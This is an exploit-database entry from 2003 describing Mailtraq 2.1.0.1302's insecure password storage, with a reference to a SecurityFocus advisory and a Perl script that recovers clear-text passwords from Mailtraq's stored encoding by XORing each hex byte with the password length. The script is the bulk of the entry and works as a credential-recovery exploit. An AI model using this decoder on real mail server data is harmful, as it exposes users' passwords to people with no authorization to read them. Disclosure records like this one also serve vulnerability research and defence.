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Mailtraq 2.1.0.1302 - User Password Encoding

🗓️ 16 Jun 2003 00:00:00Reported by Noam RathausType 
exploitpack
 exploitpack
👁 13 Views

Mailtraq stores passwords insecurely, risking exposure of clear text passwords to attackers.

Code
source: https://www.securityfocus.com/bid/7923/info

It has been reported that Mailtraq does not securely store passwords. Because of this, an attacker may have an increased chance at gaining access to clear text passwords. 

#!/usr/bin/perl 

$Password = $ARGV[0]; 

print "Passwords should be something like: \\3D66656463626160\n"; 
print "Provided password: $Password\n"; 

$Password = substr($Password, 3); 
$Length = length($Password)/2; 

print "Length: $Length\n"; 

for ($i = 0; $i < $Length; $i++) 
{ 
 print "Decoding: ", substr($Password, $i*2, 2), " = "; 
 $ord = hex(substr($Password, $i*2, 2)); 

 print $ord^$Length, " (", chr($ord^$Length), ")\n"; 
}

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16 Jun 2003 00:00Current
7.4High risk
Vulners AI Score7.4
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